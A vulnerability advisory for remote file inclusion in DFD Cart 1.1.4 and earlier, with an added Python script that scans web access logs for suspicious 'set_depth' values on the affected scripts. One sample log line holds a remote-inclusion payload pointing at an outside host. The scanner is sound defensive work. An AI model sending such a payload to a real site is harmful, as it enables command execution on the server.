Description
Multiple vulnerabilities have been identified in DFD Cart that could allow attackers to execute arbitrary commands. The issues are caused by input validation errors in the "app.lib/product.control/core.php/product.control.config.php", "app.lib/product.control/core.php/customer.area/customer.browse.list.php" and "app.lib/product.control/core.php/customer.area/customer.browse.search.php" scripts when processing the "set_depth" parameter; remote attackers could exploit them to include malicious scripts and execute arbitrary commands with the privileges of the web server.
Note: An unspecified cross-site scripting vulnerability has also been reported.
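For sites that cannot upgrade immediately, the following added example (not part of the advisory or of DFD Cart) reviews web server access logs for requests to the three named scripts whose "set_depth" value is not a plain relative prefix. The allow-list pattern, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script paths the advisory names as processing "set_depth".
AFFECTED = (
    "app.lib/product.control/core.php/product.control.config.php",
    "app.lib/product.control/core.php/customer.area/customer.browse.list.php",
    "app.lib/product.control/core.php/customer.area/customer.browse.search.php",
)
# Assumption (not from the advisory): a legitimate value is empty or a short
# relative prefix such as "../../". Anything else is reported for review.
SAFE_DEPTH = re.compile(r"(?:\.{1,2}/){0,8}")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def suspicious_set_depth(log_line):
    """Return the decoded set_depth value to review, or None if the line is clean."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # The cart may be installed under any prefix, so compare the end of the path.
    if not unquote(url.path).endswith(AFFECTED):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("set_depth", []):
        if not SAFE_DEPTH.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, value) for every request worth reviewing."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_set_depth(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed access-log lines (combined log format), not from a real system.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2007:10:00:01 +0000] "GET /shop/app.lib/product.control/core.php/product.control.config.php?set_depth=../../ HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Oct/2007:10:00:05 +0000] "GET /shop/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http%3A%2F%2Fhost.invalid%2Fa.txt%3F HTTP/1.1" 200 87',
    '203.0.113.9 - - [01/Oct/2007:10:00:09 +0000] "GET /shop/index.php?set_depth=../ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: set_depth={value!r}")
```

Access logs record only the query string, so a "set_depth" value sent in a POST body is not visible to this check.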
Vulnerable Products
Vulnerable Software: DFD Cart version 1.1.4 and prior
Solution
Upgrade to DFD Cart version 1.1.5:
http://sourceforge.net/projects/dfdcart/
CVE
CVE-2007-5136
CVE-2007-5098
References
http://sourceforge.net/forum/forum.php?forum_id=738710
Vulnerability Manager Detection
No
IPS Protection